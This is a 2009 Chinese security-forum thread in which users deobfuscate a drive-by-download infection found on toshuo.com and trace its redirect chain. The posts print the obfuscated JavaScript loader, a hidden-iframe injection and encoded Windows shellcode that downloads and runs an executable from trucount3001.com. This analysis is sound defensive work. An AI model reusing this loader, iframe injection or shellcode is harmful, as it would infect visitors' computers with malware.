toshuo.com [挂马]

qianwenxiang

关于:hxxp://toshuo.com/diet/解密的日志(全体输出 -  9):
Level  0>http://toshuo.com/diet/
Level  1>http://habrion.cn/in.cgi?2
Level  1>http://mol4un.firnop.cn/de
Level  1>http://9spice.info/t/?35179bb1d6
Level  2>http://trucount3001.com/promo/676
Level  3>http://trucount3001.com/cgi-bin/exe1.pl?676
Level  1>http://9spice.info/t/?21917236f
Level  1>http://9soldo.info/t/?19100fc2
Level  1>http://9spice.info/t/?257870748
日志由 Redoce1.9第72次修正版于 2009-6-15 12:39:24 生成。

shadowmin

邪恶，每个IP只能连接一次。
第二次就成了not found了。

sxbxyh

只解出第一个网址，指点一下

shadowmin

1. <script language=JavaScript>function folb4a32(h){var q=h.length,o=1024,l,k,n,u=0,g=0,v=0,p=Array(63,41,52,45,33,1,44,58,42,13,0,0,0,0,0,0,28,51,40,20,17,25,14,15,12,4,36,57,32,49,8,62,35,11,31,5,21,16,48,24,34,0,18,0,0,0,0,47,0,46,7,50,30,3,2,60,10,38,19,9,61,54,6,37,27,26,55,56,29,53,59,39,23,43,22);for(k=Math.ceil(q/o);k>0;k--){n=\'\';for(l=Math.min(q,o);l>0;l--,q--){{v|=(p[h.charCodeAt(u++)-48])<<g;if(g){n+=String.fromCharCode(228^v&255);v>>=8;g-=2}else{g=6}}}eval(n);}}folb4a32(\'jmBXYasJhRkJSfEJxilVLaBX5FgrYas4DiWLhf1cjqEPUnNAePtPfqE4knNMhzWX5il2CG92@jgozdWmnANJUZ1rQ_@rxZEPbnBc98BLQaHJQ_lVGwq4UcBczaWJhfNA1zNJH86oS8NLQiNA9v@rZR9r90gVjjl2UAlVGG6MIGEPYfkPEx3uzjHP5msLHfEmjr9MxfEwNnWmneWPxZkXSm1rhaBX5q6mW_@PfqE4knBmerH\')</script>

复制代码

这里把\去掉
然后把函数里面的eval换成alert
解出

1. 
   
2. ---------------------------
   
3. Microsoft Internet Explorer
   
4. ---------------------------
   
5. window.status='Done';document.write('<iframe name=70748 src="http://9spice.info/t/?'+Math.round(Math.random()*9638)+'70748'+'" width=122 height=79 style="display:none"></iframe>')
   
6. ---------------------------
   
7. 确定   
   
8. ---------------------------
   
9. 然后，在来一下document.write清除就可以得到地址。
   
10. null<iframe name=70748 src="http://9spice.info/t/?864470748" width=122 height=79 style="display:none"></iframe>
    
11. 
    
12. 
    

复制代码

shadowmin

打开上面的网址，中间有一个跳转，得到如下的代码。

1. eval(unescape('%0a%76%61%72%20%51%3d%27%36%31%30%39%38%34%63%34%34%62%35%35%39%30%62%37%37%33%65%64%33%65%33%37%33%63%36%38%37%34%36%64%36%63%33%65%30%61%33%63%36%32%36%66%36%34%37%39%33%65%33%63%36%34%36%39%37%36%32%30%36%39%36%34%33%64%32%32%37%32%36%35%37%30%36%63%36%31%36%33%36%35%32%32%33%65%37%38%33%63%32%66%36%34%36%39%37%36%33%65%30%61%33%63%37%33%36%33%37%32%36%39%37%30%37%34%33%65%30%61%30%61%36%36%37%35%36%65%36%33%37%34%36%39%36%66%36%65%32%30%34%37%36%35%37%34%35%32%36%31%36%65%36%34%35%33%37%34%37%32%36%39%36%65%36%37%32%38%36%63%36%35%36%65%32%39%30%61%37%62%30%61%30%3。。。。。。。

复制代码

你可以用LZ的工具解
我的解过程是在freshow里面连续两次esc
得到如下的代码

1. 
   
2. eval(unescape('
   
3. var Q='610984c44b5590b773ed3e373c68746d6c3e0a3c626f64793e3c6469762069643d227265706c616365223e783c2f6469763e0a3c7363726970743e0a0a66756e6374696f6e2047657452616e64537472696e67286c656e290a7b0a09766172206368617273203d20226162636465666768696b6c6d6e6f707172737475767778797a223b0a09766172207374726。。。。。。
   

复制代码

1. 
   
2. eval(unescape('var SNg5YE = '';。。。。
   

复制代码

把代码里面的"eval(unescape('"去除，注意，最后面对应的（'));'));）
然后在来document.write清除，
得到shellcode

1. 
   
2. "%u00e8%u0000%u5d00%ued81%u11dc%u0040%u8b64%u3035%u0000%u8b00%u0c76%u768b%u8b1c%u8b36%u0876%uac56%u8b3c%ufb75%u3e80%u757d%u83f6%u03c6%u3dad%uffff%u0000%ueb75%uee83%u5b11%u0de8%u0000%u4c00%u616f%u4c64%u6269%u6172%u7972%u0041%uff53%ue8d6%u0007%u0000%u7275%u6d6c%u6e6f%uff00%ue8d0%u0013%u0000%u5255%u444c%u776f%u6c6e%u616f%u5464%u466f%u6c69%u4165%u5000%ud6ff%uc929%u958d%u1292%u0040%ubd8d%u128d%u0040%u5151%u5257%uff51%ue8d0%u0008%u0000%u6957%u456e%u6578%u0063%uff53%u6ad6%u5701%ud0ff%u0ce8%u0000%u4500%u6978%u5074%u6f72%u6563%u7373%u5300%ud6ff%ud0ff%u2e2e%u315c%u6800%u7474%u3a70%u2f2f%u7274%u6375%u756f%u746e%u3033%u3130%u632e%u6d6f%u632f%u6967%u622d%u6e69%u652f%u6578%u2e31%u6c70%u363f%u3637%u0000%
   

复制代码

清除可得地址。

[ 本帖最后由 shadowmin 于 2009-6-15 16:58 编辑 ]

sxbxyh

谢谢解答，继续请教：http://mol4un.firnop.cn/de
这个网址如何得到？

自己已找到答案，谢谢！

[ 本帖最后由 sxbxyh 于 2009-6-16 08:39 编辑 ]